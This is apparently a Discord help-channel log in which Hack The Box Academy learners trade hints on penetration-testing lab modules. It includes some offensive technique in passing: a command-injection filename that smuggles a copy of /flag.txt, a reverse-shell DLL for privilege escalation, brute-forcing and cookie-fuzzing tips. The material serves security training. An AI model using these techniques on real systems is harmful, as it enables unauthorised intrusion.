#modules
If I'm doing the modules, should I write the important parts in a notebook or should I use the softwares provided in the learning module of the Academy?
Take detailed notes
@lofty kindle DM me
@west canopy ok, inbox
I agree with @livid pier. Everyone has their own thought process as they take notes. I'd save links, tools mentioned and be sure to download the cheatsheet for each module. These can help you in the industry and on other parts of HackTheBox. At some point it may be challenging to keep everything in your head, so you can keep a document that you can easily search through to find tools you need for a given situation.
It can also be good to practice doing formal writeups, and attempting to explain what you did from the offensive and defensive side.
I keep a google doc for each module and try to screenshot each step of each problem
I use cherrytree and keep as many notes as possible for future reference.
hi guys im stuck at this question "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'." in Getting started privilege escalation, i use the linpeas.sh, i get the ssh private key but i cant connect with it
i check the id_rsa with vim many times but i don't get it what is wrong
if anyone can give me a hand please
@balmy creek Try SSHing as root instead of user1, using the id_rsa key. The first time it will give an error. Then do a chmod 600 on the id_rsa key, and try to connect again
the same error and id_rsa is -rw-r--r-- 1 root root 2602 Mar 30 15:10 id_rsa
after chmod 600 it should be -rw------
I will say however the last time I tried this section I was not able to get it to work, despite reproducing what was in my notes.
bro thank you so much hahaha i finally did it
i had tried with 600 but it gave me an error and I tried to imitate it with 644, which is how it came out in the linpeas
Anyone able to help with the Footprinting module, IMAP/POP
Hello
Hi please i haven't been active here
Can anyone help
I have been trying to install kali linux on my MacBook
But having issues virtual box
Always showing this
''Unsupported hardware
architecture detected!
The installer has detected an
unsupported architecture. VirtualBox
only runs on the amd64 architecture.''
And i have also tried VMware it's saying i can't install because my Mac is not running on Apple silicon.
I will be very happy if anyone can help me out on this i haven't try to install for so long
Thank you all and God bless you all
What my VMware is saying
''This version of VMware Fusion is
for intel-based Macs, but is
being run on an Apple silicon
based Mac via Rosetta-2.
A
See KB-84273.''
@here
that error is telling you that your mac is not x64 or x86, and so you need a version of virtualbox or vmware that is compatible with apple's processors
at least, that's my interpretation
I am having problems with the login brute forcing module, skill-assessment website section. I've been stuck on this module for some time.
Specifically because the password hydra gives me doesn't work
What is wrong with my second command?
can someone explain the difference between kerberos and LDAP? they both seem similar since they are used to authenticate for AD
@urban valley Kerberos is more or less "single sign on" for AD environments
@raven cairn DM me
@west canopy I will. I have to do some college stuff and then I will dm you.
somebody plz help lol
how is this wrong
I realize that's not the flag but I feel I did exactly as the instructions stated and that's the only response I got
@unreal sigil Assuming you went through all the steps in the section, you will need to delete HTB_City and HTB_New_City
Then after renaming a city to "flag" you should be able to curl it and find the answer
Okay I added that now too, still no flag
oh , new city
got the flag lol ty
@trim solar This channel is for HTB Academy modules. Is "object" a live box?
no. it is retired machine.
Ah gotcha. Not sure if there is a Discord channel for retired content. You could probably find a write up online somewhere though
ohk thanks
several things that I see wrong
dm me and I will help you
@rustic sage I think that's going to be the "starting-point" room
Hi everyone, I am doing the final skills assessment of web services & api Attacks, someone who could give me a hint or what should be used to find the flag i'm trying with sqlmap but i'm not sure how perform there isn't hints ...
Thanks for the help! @livid pier @west canopy @unique valve @lethal atlas I learned to use both Flameshot and Cherrytree and downloaded the cheatsheets for the modules I've done, and I'll follow this for other modules too.
hi guys!!!
just wanted to know if it is a mandatory to use pwnbox to make labs? because i cant ping the "target"
i used the vpn file, and since there is a VPN file i must be able to contact the "target" and use smbclient to list the share (im doing the windows module)
and now target is down so maybe it was that, i retry
....
and again the target disconnect...
i remember why i stopped using academy
cant even make a shared folder without the rdp session disconnect and cant reconnect
30min and cant even make this simple stuff due to connection reset every 2min... i pay stuff for nothing...
this is a VPN issue... i must stop and restart the VPN to make it work...
and even when target is up we cant connect to list SMB with the command provided xD
even with smbclient -L \\\\IPofTarget -U htb-student
So, I'm doing Linux Fundamentals, and module Working with Web Services. Question one is to find a way to start a simple HTTP server, and there is examples. Only thing wrong is, whenever I try to start one, I get permission denied. When I use sudo apt install apache2 I get a password prompt, but was never given one earlier?
Consider the firewall on the Windows target. The section reading mentions this. Part of the exercise is considering what might block connections over smb.
not at all
i know about the ping issue, but we must list the smb share without making anything else than smbclient
Try disabling the firewall on the windows target.
with being disconnected every 2 min from the target it will be hard to do that on every lab where we must make "external" connection
You wont have to do it on every lab but it's important to consider the firewall always because in the real world its a factor whether you are an IT admin or pentester.
nothing changed
Feel free to dm me.
ty but i know that and i was sure it wasnt the problem like we can see
dm for what??
the lab doesnt work
and im disconnected every 2min...
So we dont spam the channel. The lab does work as others have completed it.
lol nope it doesnt mean it worked for others
i was able to answer all the questions
you dont need to have it work for that
Is htb-student in the permissions list of the shared folder?
yeah
read for everyone
like it is the default
that's the default lab, if i needed other things to be changed why it isnt mentioned
hello world
Testing now.
tried with smbmap and said port 445 not open...
thanks
the connectivity is a nightmare, i must CTRL+C every 2min to be able to reconnect via RDP to the target so it doesnt help too
so why it doesnt work on my end?
like the connectivity
i reset 3 times the target, the pwnbox...
you just created the folder and share it like in the "tutorial"??
Yep
Then either disable the firewall or enable rules that allow smb
In Windows there are 3 firewall profiles that can be applied. Domain, Private and Public. Each considers what network connections originate from.
already did
i first disabled it like you can see in the screenshots
after that i created a rule for smb to allow all inbound/outbound
i gave up
with the disconnect every 2min it is a nightmare to troubleshoot too
You sure you tried disabling all 3 firewall profiles?
thanks for your time
yeah im sure
but even with all of that, it is normally isnt needed, it works for you by following the tutorial and nothing must be changed
i reset the target 3times and did extra steps but didnt worked and like i said it takes me 10min to just make a simple firewall rule with this connectivity problem (and i have only problem with academy)
im just the type of guy who want to do it because i wanted to follow it but i already did some boxes with smb pentesting
anyway, thanks a tons for helping
DM me if you would like to troubleshoot further. My RDP session is staying connected as well so it may be worth looking into a few other details.
now my keyboard doesnt work on the RDP session xD
i will stop htb for some days lol thanks
i tried a last time and now i have a stable connection (idk why...) and it works without any change @unique valve
hey guys, i was doing the 'using web proxies' module and i dont understand what this question is asking of me
from the zap fuzzer section
the hint told me to ||fuzz the cookie with md5 hashes with usernames in a wordlist||... i think i did but idk what im supposed to look at
you must fuzz the cookie you found previously with the top-usernames-shortlist.txt but dont forget to md5 every username
lol i just saw the hint is what i said xD
One more Note: Kerberos is exclusive for Authentication, where LDAP was designed as Directory Service (who remembers NIS), so Information Data (groups, users,...) are centrally stored.
and kerberos used ticket and it is used to not pass any sensitive info on the network
and ldap is a way to communicate with AD when kerberos is "only" an auth service
LDAP and AD is like apache and http where LDAP=http and apache=AD
if i can make the parallel
it is the entire wordlist in your screenshots?
and you fuzz the cookie previously found?
yessir
so idk what you did wrong ^^
lmao
wait some people who has access to it because i dont lmao
did you visit the /skills/ before fuzzing??
maybe it isnt the previously cookie you must fuzz but a new one
GL
(Subnetting): so if I want to create 8 subnets, = 2^3, should I change 26 to 29?
Also, I'm using IP Calc to help me on this, I hope it's not considered cheating, I wouldn't know how to do that with pencil and paper
OMG I think I figured this out I can't believe it
I felt the same way when I first tried subnetting. It can be very daunting until you catch that one key thing then it all makes sense.
I read somewhere that you could create tons of subnets in your home network to protect yourself from attacks
because it'll take a lot of time to scan every single one of them
it would also create latency on the network
if you decode the cookie found with md5 you will see, as the question says that it is "guest". What you need to do is load the entire wordlist, then encrypt each word in md5 before fuzzing. Burp payload processing allows you to do that. I cant remember how to do it in zap.
feel free to dm me
Quick question guys, I'm doing manual credential enumeration and everytime i enter the command to post I'm getting a bash error that no such file or directory. But that's how they showed it in the examples, any idea what I'm doing wrong?
curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" <IP>/xmlrpc.php
Has anyone done the bug bounty methodology module? I'm either not understanding the question, or the question answer is wrong edit: i did not understand what it was asking
Module: File Inclusions
Section: Automated Scanning
Can anyone help me with this one
Its cleared... Thanks
Can anybody tell me what I'm doing wrong? I'm doing it just like the module (hacking wordpress) says to do it.
just read the section and apply those same wordlists
it will work
first u need to find a valid param
Hey guys. I need help at password attacks module. Can anyone help me?
I tried the same word lists.. Gone through the section in detail.
Can anybody help with hacking wordpress?
yes sir
Hi! Unsure if this is the right place to ask, but recently i redeemed a htb academy gift card and currently have some money in my account balance. Is it possible to redeem that into a subscription purchase? Whenever I try to buy a subscription it prompts me to pay again
sure.
better question for the staff.
Ah definitely, should I contact a staff member directly?
I would not. They tend to frown on that.
You might just tag them with "@red obsidian"
yes I can
Contact support via the green chat bubble while logged in.
Great, thank you :)
maybe ip=url?
no, it needs an IP address
or maybe its local
default-passwords.csv?
i meant the IP address
i'm understand. it's new questions!
what are you working on now?
Anyone here good with python?
Sorry, no.
me either bro
You may want to check the community help channel.
Well anyway, I got invited to do some google coding problems, I have finished the first couple levels and they asked me to refer a friend, if anyone wants to try them
A little, what's it about?
dm me
I am hoping if i can finish them it will lead to an interview
I need a job so bad
I found some binary code on a website and translated it, turned out to be an invite
nice!
I didnt originally plan on doing this, seemed like it could be a cool opportunity tho
GL brother, I really hope you land it, I hear its a great company to work for.
You're only limited by how much you want something, if you want it, you will take those measures to achieve it. If you want to work at google, you will work there.
Lol thanks, its not the most useful change log 
Hi, has anyone connected finished the final assessment for the File Upload Attack module. I think I'm near the end but I can't read the file. MP please.
EDIT: Got The Flag, thanks to @west canopy
@alpine summit I got you dawg
Where i can get the root password for the htb vms? Or do I need the root privileged for nmap?
@scarlet mirage check the desktop for a my_credentials.txt
thx
hi everyone! I'm in HTB Academy on Getting Started module in service scanning. When i try to do an smbclient using 'bob' username with the password mentioned along this page it give me a logon failure
i try manually writing the password and copy and pasting the pass and i cant access
any hint? Please
@glossy oxide in your URL make sure it includes: index.php?language=languages/
after that try and use some of the techniques shown to read the flag
What's the command you're using?
smbclient -U bob \\<port>\users
then it ask me for the password but i cant login due a logon failure
is not <port> is the <ip> target the i enter the pass but i cant login
then i*
I will dm you
okay!
Hey everyone Im learning linux fundamentals but I am having trouble finding the shell.
Where you at? wht section?
found it
In all seriousness
echo $SHELL
Thanks!
I was including it, but I was combining techniques wrong. Then I started trying more complex (and useless) things, as always.
Anyone able to help with the Easy Lab on footprinting?
try HTB{<flag>}
Which module and section is this?
do u copy and paste the flag or text it manually?
copy/paste
@stark atlas DM me if you need a nudge on footprinting easy lab
Just jumped off although I will likely message you tomorrow if a break from it doesn't help - thank you!!!
Wrong flag altogether.
You might have found a flag from an upcoming section.
i'm also having trouble with this section. I got the S** user but i can't find anything else
A bit oot, but still relevant, i have question regarding cube, i believe i finish around 5 modules and 2 in progress but why my cube only left 20 ? While 2 in progress is only 10 cubes each
@faint locust It might have to do with the cost/refund ratio of the modules you did. I think "fundamental" modules cost 10 but refund 10. But a 50 cube module also refunds 10 I believe. My math could be wrong though
So if we use for 50 cube, we will lost 40 cubes if the return is 10?
I think so . Cube return is 1 out of 5
so 100 cube module gives 20, 500 cubes gives 100, etc
Okay thanks
I was stuck on Windows Privilege Escalation > DnsAdmins. I have found a solution differently but want to know how the section intended it to be done. I was able to get the netadm account to show up as Domain Admin (when running 'net group "Domain Admins" /dom'), but am unsure how to grab the flag after this point. Any help is appreciated, thanks in advance!
@severe birch I had to use a reverse shell DLL file in order to get the flag
That is what I did as well
But i think you might be able to right click on CMD, run as administrator, and then select the recently added Admin user
Like i think it needs an elevated CMD shell
hi! Need some help with command injection skill assessment, i think i already have the enter point but no clue how continue
Hi someone already finished the web service & api attacks module? There is no hints and i'm stuck any hint would be a great help!
Where are you stuck ?
hi guys, I'm stuck in a htb-academy beginner module (Windows OS Fundamentals)
with a Linux VM (from htb) I establish an RDP connection to a Windows OS. There is a shared folder there. The Windows firewall is off. I should create a mount point on this Windows shared folder with Linux. This worked. Now I should display a list of the shared data with the command net share. But here I get an error message...
Can anyone help?
Normally, this should come out.
Solved:
ok i was blind. This command is to be executed on Windows. *slap
.
Ok, then I have another question based on that. Next in the module it says:
"We have not shared C: manually. The most important drive containing the most important files on a Windows system is shared via SMB during installation. This means that anyone with the appropriate access can remotely access the entire C: drive of any Windows system on a network."
But when I look at the property of C:\, it is not a shared.
How is that possible?
Its a default setting in Windows operating systems. For some reason its not reflected in the properties you are looking at but its shared as seen from the net share command output. Theres a service called Remote Registry that when started, with the right local admin credentials allows remote connections to C: over the network. Can make administrative work easier but also create quite a security issue.
So C:\ is a hidden share, but is shown as "Not shared" as shown in the picture above. Confusing
Agreed. That is interesting.
If I create my own hidden share on the same host, it is not visible to the others, as desired. However, under Properties it says "Shared", unlike C:.
ok i understand
thanks for the answer
No problem. Hidden shares cant be as easily discovered remotely. Its an effort by Microsoft to try to make sure connections to shares come from people who know the exact name of the share. But all one must do to connect to one is know the share name followed by $
Okay, I understand
Only the host can see the shared folders simply by using net share or Computer Management. Remote users cannot do this, they need to know the exact name. All right.
With hidden shares yes, but like most things in Windows theres probably a way to get around this remotely. Would be worth doing some research on.
Thanks
@west canopy did you use xsstrike to find the payload that would work or did you use the other two resources given in the previous section? My login form shows up but the document.write is showing and the image url form is still showing with my ;document.get.elementbyId showing after my login form.
Hello, for module "Attacking Web Applications with Ffuf", in the last section, i need to put all extensions in alphabetical order, but doesn't work...Anyone can help me ? Thanks π
hey all, just in case you haven't noticed we introduced global search functionality on Academy. if you search you will be shown both modules and sections that contain your search term. should be useful for anyone working through the content, exams, using Academy as reference on a pentest, etc
dm me and I will help
Any chance you had a similar situation for the ServerOperators section?
@broken warren I tested each one the examples provided in the section manually
@severe birch Not sure. I don't have anything in my notes about it
Hi, I'm stuck on nmap enum Firewall & ids/ips Hard lab.
Objective: submit version of service client was talking
Hint:they were forced to add vital service for customers as they require large amounts of data
But when I type the answer it's not correct...
If you need help DM me
I did: nmap -sV -sC ip address found port 22 and 80
Then nc -nv ip address
Found the answer but not accepted
That will not get you the flag for the hard lab
What trusted port did you discover in the previous lab?
There is a trusted port that will allow you to get packets through that you should have discovered earlier.
Don't even remember π
You got the easy and medium labs done, correct?
ok so you don't remember what source port you got? Do you remember all the ports you discovered? p22, and 80 are not involved in the hard lab
Will have to re-do the medium then --'
redo some of the steps and use notepad to keep some notes on your process and discoveries, hit me back when you've gotten the trusted port that will allow you to pass TCP/IP packets.
@open spruce try doing -p- for all ports, there might be a "hidden" port for you to find
@west canopy already done
try 'nmap -sS -sC -sV -p-'
@maiden slate You requested a scan type which requires priviles. Quitting
I tried with sudo but ofc it asks for the password
God I did not realize
No one does, hidden in plain sight
How does the Windows OS academy module expect me to smbclient into the target machine if it's on a different network...?
@open spruce Figure it out?
Same result and @maiden slate I found the screenshot of my answers from medium lab
My terminal jobs
you used the sudo su command and input creds and you still got an error?
No error but it displays the same only 22 and 80
Alright try 'nmap -sS -sU -V <IP> --disable-arp-ping ( I can't remember the trace command)
Mabye not the -sS, can't remember if you can do that and -sU together or not.
anyone please give me a nudge in information gathering module
I did sudo nmap -sS -sV -sC -sU ip --disable-arp-ping
Platform x86_x64Linux
Available nsock epoll poll select
@torpid ermine Fully Qualified Domain Name
yep
@open spruce So did you remember what trusted port you used? It should be in your lesson.
Just to reiterate my question from earlier, I am trying to do Windows Privilege Escalation > Server Operators and I have been able to have the user show up under "net localgroup Administrators", but I am unsure of how to retrieve the flag.txt with these new privileges. Any help would be great.
i need to get that fqdn for that domain
inlanefreight.htb
@maiden slate I don't remember but I have the screenshot with the nmap I did to find the answer for the medium if you want I can send it privately
Go ahead
you need to use nslookup
yes i tried
your command is missing ne thing
also tried adding vhost
can someone give me a nudge on broken authentication > session attacks > Bruteforcing cookies > question 2? I am struggling to find what it is encoded with
Send me the cookie
Yoooo whats up everyone. I'm working on Bike, and can't get past displaying one [object] in the output of my Repeater. Checked all the code but no joy. I know the output i'm shooting for is "root". I did do the walkthrough but I'm thinking maybe something is awry with either foxyproxy or burpsuit
copy from PDF it's broken, be careful of indent and line break
much love thank you
I think im on the right path now. I was missing something small and stupid as usual
Story of my life
literally just needed to install cookie manager to see the persistent. Burp wasnt catching it.
If I am able to get my currently logged user into the localgroup domain admin or administrator, how can I use to view directories like the /Administrator directory? I keep getting access denied and I am assuming I am missing a step or something
I just completed it 100% as well
(Btw, someone know why i can't share screenshot in the channel ?)
good question
Talk to @little whale
Finally
Ho, thanks ! it work
Thanks to you, I got it!
Nice!
Congratulations!
When are you going to the exam?
I still need some time
Thanks !
I don't know, i have some question about this one again. I will do when I find answers^^
It happens faster than you think
Yes, still two modules
Could someone please help me. I'm stuck on the network services challenge of the password attacks module on hack the box academy. All of the challenges start with the phrase "find the user" but I have no idea how it expects you to find the user. I've tried running nmap scripts and banner grabs but provides no actionable information. Right now I'm brute forcing the WinRM service with nmap nselib password and username lists but it's not getting me anywhere. Is it another one of those stupid ones where you have to nc connect to a random port and sit there for 30 seconds?
I would add a picture but it won't let me
No images in academy, just for me ?
Try navigating to the section using the sidebar
Hi there, I am looking for some assistance in [Attacking Web Application with Ffuf] Module, Parameter Fuzzing - GET section. I have the answer already just by guessing (lucky in that regard) but what I can figure out is how I would actually get the answer. Appreciate any guidance: The question asks "Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?" What page? I have tried the base (index.php included or not) and the various subdomains and directories with no success on the parameter fuzzing.
@kindred prism you want to fuzz against /admin/admin.php?FUZZ=key
Have left this going for 5 minutes, refreshed, now its been 10 more, anyone know how I can fix this?
Took me 20 mins but it did spawn
Really frustrating
Yikes, guess its time to call it a night lol.
which module
Footprinting
ahh I'm getting weird responses with ffuf module on spawning
There is no flag here. Get back to hacking!
@rustic sage Yes! Thank you!
.
Need help for module "Login brute forcing", section "skills assessment - service login".
Can you confirm the website we need is on the same target IP ?
Hi! I've a question about the module Information Gathering and the host gear.githubapp.com. I have to find the servername but when I submit it it's not accepted. Am I wrong, or has it changed?
Spawn the target and use cURL to send an HTTP request to http://<ip>/download.php
This answer is refused, can someone confirmed it's normal? I was pretty sure about it.
Tried removing the dot at the end?
I tried without the dot, but it's not accepted neither. Do you agree it should be this (with or without the dot)?
I've not done the module, friend, I can't help, sorry
Ok, thank you anyway. There is no hints so I guess it should be simple.
I've not found any of the academy stuff easy, even the easy things are somehow made hard.
I've done several modules and I found some of them easy, usually with the courses it's doable. If you need help with a module I've done, I can help.
Which module are you talking about?
I'm talking about Informations Gathering.
Nope. Different module
this one, I haven't taken yet
Still no luck in Brute Forcing module, Skill Assessment last two questions. Anybody here already did that module and could help ?
@glacial blaze DM me.
Thank you @main vapor !
I'm in need of help. I've been trying to solve Network Enum w/ Nmap: Final section (Hard Lab) for weeks. I've (finally) discovered a new port 50,000. It's an IBM DB2 service.
running db2-das-info.nse returns me nothing. Tried both the custom "50,000" port. Tried the default (523) port. Changed my source port around. Tried all types of scan-types.
I don't know what else to do. I received bad information from someone last week, led to believe (foolishly) that I was supposed to enum DNS... and only today have found this "hidden service". I'm still unable to enumerate a service-version.
any help or hints at all. I am very fresh to this. I've been here only a month and this one is really causing me a lot of pain. I feel like I've exhausted all of the research that I could
Couldn't enumerate the DNS, either *(I don't know if that's the correct service, or the db2)... either way, I am stumped and can't crack either one.
I'm not sure where I'm going anymore. I feel like this is a bit too advanced for any newcomers.
@1emur Keep it simple. You just want to find a way to get this port in an opened state.
anyone please give me a nudge in information gathering module
@torpid ermine I did it on yesterday, do you want we DM? When you'll be in a next section I will ask your help too.
I don't know, man... I've tried minimal and maximum handles. Scripts. No-scripts. Sourceport. No-Sourceport.. i'm throwing my hands up. This thing is breaking me down.
sure thank you
tried removing --disable-arp ("well, maybe it needs to resolve something").
dns resolution... no dns resolution... with ICMP, w/o ICMP (obviously, the IDS prevents that one, but I thought "crazy, but at least try it")..
with and without changing my source-port.. I don't know what else is wrong. I've been trying everything
You are overthinking this and may have not tried something simple learned in the module
I've even stripped it down to just "--script" and nothing else
tried no script at all. I'm down to just "-sV" (and of course -Pn)
Some help about -->STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86-->Page 5 Identifying Bad Characters
When im creating the new array, i get this:
Invalid value: "Bytearray"!
Unknown command/expression: "--Bytearray"
Anybody else not using browser based pwnbox and having problems reaching targets from VPN ?
sometimes
Okay I answer my question in case someone else has the same thing. For the ERC command to work, a program must first be open
Just reset the target
Sometimes i need to reset it several times
hey guys, I have problems with an answer in INTRODUCTION TO ACTIVE DIRECTORY
basically this is the question: What role ensures that objects in a domain are not assigned the same SID? (full name)
the answer seems pretty easy, but no matter how I write it, it is wrong
Full name, no acronym for that one
Is anyone else having issues spawning targets for the modules? Trying to do Footprinting module but last night and today the machine just keeps saying "Target is spawning..."
i do on occasion and often my scans are unacceptably slow, to the point where it goes beyond the time-limit. i don't understand it.
other days, it's fine
I have been doing these for maybe 2-3 weeks without issues, but last night and today it is far too slow to accomplish anything.
In the Session Security module, the Cross-Site Request Forgery (GET-based) section - I had to change method from GET to POST in the attached html code, to get the result. Anyone else had it? Surely it was supposed to work with get method as per section title.
I think that it has something to do with the weekend. Most people have a full time job and have only time for learning on the weekend. Therefore, the servers are working quite hard, which leads to delay.
In the Web Attacks module - Bypassing Security Filters, the text of exercise says "To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./". It's not clear if I should use directly as input "file; cp /flag.txt ./" (that the browser already encodes as "file%3B+cp+%2Fflag.txt+.%2F") or I should also try to encode ; and / in different ways. Because for both strings I tried all the HTTP methods (https://github.com/danielmiessler/SecLists/blob/7a42879a4687429778fea78067d075d4616ba83f/Fuzzing/http-request-methods.txt) with no results
DM me if you need help with it
Without giving too much info - this question is way easier to do using burp than manually. Different methods may require some additional fields https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods
And I spent way too much time on that one trying to do it by hand.
Hey, quick question, can someone ping me the wordlist to use for the 3rd question in the skills assessment in the Attacking web apps with Ffuf (find the 'you don't have access page')? I understand the process but my scans are taking over 90mins to complete and the server is only up for 90mins so I have to re-start the scan so it's a catch-22. It's frustrating to put it nicely.
it's one from cheat sheet
Thanks. But I think I've tried that one...
I can confirm that 'page_file_name' is in the wordlist, without extension. Hint is actually a good one.
in the 'small' file?
Yes
OK, one last scanning before I move on.
Hello, I wanted to know if I subscribe to a plan. Can I stop it at any time or is there a commitment period?
could i trouble some one for a nudge pls Cracking Common Hashes question been stuck for months keep coming back to it but can't see wood for trees somewhere
the hash
7106812752615cdfe427e01b98cd4083
@rocky sedge DM me brother
thank you friend much appreciated
Hello, can someone help me to better understand something in :
module : network enumeration with nmap
section : Firewall and IDS/IPS evasion - Easy Lab
@upper niche I can certainly try, what's up?
@west canopy i don't want to spoil anyone, can i dm you?
of course
Does somebody know why the right answer is not the version number of the dns server as the question states?
module: network enumeration with nmap
section: Firewall and IDS/IPS evasion - Medium Lab
@muted rampart it's actually in the format of a flag i.e. HTB{something}
For all those people who find it more convenient to bother you with their question rather than to Google it for themselves.
could someone help me with 'Shells & Payloads' - 'The Live Engagement'. I'm on Host-1 found many ports and services open with nmap, but no ms exploit that works. Also the creds ' tomcat | Tomcatadm ' do not work for the manager access, not sure where those came from...
nvm, it was a webshell exploit
I am supposed to be finding a network request to a flag... I have clicked through every single request but I can't find any request to a flag. Can someone help me understand?
@tight mesa try refreshing the page, eventually you should see something like this
okay, thank you. I've refreshed the page 5 times so far, and that has yet to show up but I will keep at it
I've heard from other people that they had trouble getting the flag to show up, but personally i never ran into this problem. I guess if it doesn't load maybe try respawning the target.
hey guys does anyone solve File Inclusion LFI and File Uploads ?
when i go to setting.php and press upload it gives me file not allowed error
I don't know if you tried the search function with 'flag' but that helped me
Have you tried clicking on profile first? (Above the 'upload' button, where the profile picture should be. It should open the file selection window) Then pick a file and click upload
lol. thank you brother. what an idiot i am
Haha, dw i got tricked too
nice
what commands you tried ?
module : WEB APPLICATIONS
chapter : Common Web Vulnerabilities
I have read and tried several words that according to me could be categories of public vulnerability but I did not find, is that somebody could define me what he understands by category or give me the answer?
Thx
@rustic sage DM me
thanks for your share mate
No, you do not need to modify any config files.
Try a zone transfer on the found subdomains.
I think you do need to have inlanefreight.htb in your /etc/hosts though.
if it returns you nothing try to store the curl in a txt maybe
Yes it return me nothing
I tried everything
academy > cracking into htb > java deobfuscation > http requests
it's saying the flag in the response is not the answer and that the answer should start with an n and end with a z
I have no idea what that means, I don't see anything like that from the response
Hello guys. I have trouble solving the module HACKING WORDPRESS on the section **Directory Indexing** for some reason I can't find the correct directions
can anyone help me?
nvm got it lol
Look at all the subdirectories.
what do you mean
There are many directories. Some are "misconfigured" and you can list the contents.
what should i do ?
open each directory and look at the contents
these are all directories
should i search php as well?
No, only directories and subdirectories
You can use both, whichever you prefer.
i got nothing
I'm doing the starter module and the question is "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file."
I think i already found the right exploit (auxiliary/scanner/http/wp_simple_backup_file_read) but this exploit requires the filepath. I set the filepath to /flag.txt and metasploit gives me this:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Did it work? When yes where is the content? am i even using the right exploit?
i tried to change the depth to 0 to 1 and to default 6, but im getting the same result
Starter Question:
I am working on Pentesting Basics > Basic Tools.
The module is asking for the header with an IP address. I am trying to use Netcat to do it.
However, I cannot install Netcat without the Sudo password on the pwnbox (through HTB). Is it already installed and is there a way to check?
Any help on how to proceed with this is greatly appreciated. Thank you in advance!
@elder pendant You should have access to netcat... π€ What happens when you run "nc -h"? Maybe try resetting the box
anyone finished with the file upload attacks module?
kind of stuck on the whitelist chapter
how many times are you gonna sanity check me ? xD Thanks again buddy
not sure what i'm doing wrong
academy > cracking into htb > java deobfuscation > skills assessment
The data sent to the server with POST is stored in the request body of the HTTP request
https://www.w3schools.com/tags/ref_httpmethods.asp
In your screenshot, you sent the data in the URL like a GET request. The task is asking for a POST request
curl -s http://134.209.186.158:30572/ -X POST -d "key=API_p3n_73571n6_15_fun"
would that be more accurate?
Yes.
@unreal sigil Let me try it out, please...
u forgot the -d before data no ?
yeah i had tried that too but same result
not on index page
it's literally the very last question of the whole module . i don't know how i got this far just to get stuck here lol
wym
if i remember correctly...
You need to send the request to keys.php
ugh i swear i tried that but must have had something wrong. ok i'll try it thx
not serial
lol
geese, finally got it lol
thanks for all the help
I don't agree with what the flag says
I'm obvi not ready lol
Does your pwnbox have access to the internet at all? I thought it was only for VIP users
@lament crag ping paypal.com
Never used pwnbox...
But I can try now :)
Same issue here... ://
Or whois.exe in Windows. Whatever you need
For tasks I need to connect to HTB's VPN I use a VM and if not I do it from my host OS (Linux)
Nope. Fedora VM on Fedora host :)
@lament crag Yep.
I prefer not to connect in my host OS to a network where people learn how to hack :)
Yep, but at some point, you'll need to use a VM.
And for this task, you do not need to connect to a VPN, and PayPal has an official bug bounty program with paypal.com in the scope, I don't see a reason for concern
good, where can I make a query about a subject of the FFUF module?
Working on this question currently and wondering if you ever got the answer to this and was wondering if you had to make a complex query to figure it out
Not all directories show you the content. You have to search
Hi! can someone please give me a hand with this, I am doing NETWORK ENUMERATION WITH NMAP, and on the Service Enumeration question I think i got it but the system keep saying is wrong... but i am pretty sure that is a flag... any ideas ?
the question is: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
Not the right flag...
Anyone done: Getting Started - Public Exploits ? | Should there be a VM in there?
Got it
The connection to the target MySQL usually fails a lot
#mysql -u root -ppassword -h 134.209.28.38 -P 30750
#ERROR 2002 (HY000): Can't connect to MySQL server on '134.209.28.38' (115)
Anyone knows why?
Amy working in Module Hacking Web aplication with FFUF
I have a problem with VHOST Fuzzing
come for answers to questions, instead you will get children describing the water you're drowning in. yeh I'm too old for this.
not the help he needs, you should try harder. Hear how stupid that motto is !!!
I have completed that module. Hit me up and I will help
Anyone finished the broken auth module? could use a hint with the final assessment.
Im working on skills as well
anyone got any hints for windows priv esc skills assessment 2?
trying to find left over credentials for iamtheadministrator
i can see the files its in but access denied for most, not sure if i have to escalate before
oh found it
nvm
i need some help with information gathering at Active Subdomain Enumeration. pls dm
@acoustic owl can I dm you for help?
sure
tried asking in general chat but only got trolling responses lol
which os would you recommend I run on my vm
windows or linux
and which version
installing vmware rn and it's asking me what I want to run
I was thinking linux but then do I choose ubuntu, fedora, oracle, debian, etc.
on VMBox u can install both. I'm using Parrot Debian based distro and i feel its good
Hi, i need some help with the broken authentication skill assessment module
Anyone able to help with Footprinting Lab - Easy? - Sorted now
Hello, everyone. I am having trouble with the Web Request Module.
More specifically, the Get Method of Curl.
@weary forum what part are you stuck on?
Hello, anyone finished the SQLMAP Essentials?
@soft jolt what section did you need help on?
Admittedly, I'm stuck, on probably the exact same spot. For me, it's telling me to use cURL to "search" for the flag but I'm unsure what exactly they mean by that.
When checking the response, it says "Please use cURL"
Is there some way of searching using cURL that I'm unaware of?
Having some trouble with the Phishing challenge in the XSS module, I got the creds, but the flag I see when I log in isn't being accepted
aaand it just worked even though I did nothing
@idle cliff you want to curl http://ip:port/search.php?search=flag -H 'authorization token'
Could you finish that? I'm facing the same issue
Has someone here finished the brute force login module?
@carmine hill i can help
Awesome, in the last exercise, I just don't get the webpage to load
so you're not having trouble actually bruteforcing credentials, just getting the target to load?
Yup, haha there are two assessment parts. I completed the first one (website), but now I cannot even start the second part (service login), cause I can't get to the website
maybe try respawning the target a few times?
I did that several times, from my virtual machine and personal computer and no luck. I could notice that when I tried to load the ip:port it tries kinda authenticate to SSH, so I thought maybe the website was on port 80, or another port but no luck yet
right for Skill Assessment Service Logon, you want to hydra SSH credentials
But it says to gather info about employees, so I guess there is a website, isn't it? Or I just need to use the info discovered in the previous part? If this is the last one, then I guess I got it
So having a slight problem with Web Requests POST section. I'm at the end, successfully completed all tasks but as I'm trying to search for the flag, I'm using a valid authentication token / cookie but as I run the curl command it's telling me I need "A valid authentication cookie is required!"
I've even respawned the target and repeated to make sure the authentication cookie matches up with current session and get the same thing
@carmine hill yes it's the employee name after you find the last flag from the previous section
A certain wizard
Oh got it then, thanks, I thought it was a whole new exercise
yea that threw me off too
I need some help on web requests decoding/encoding
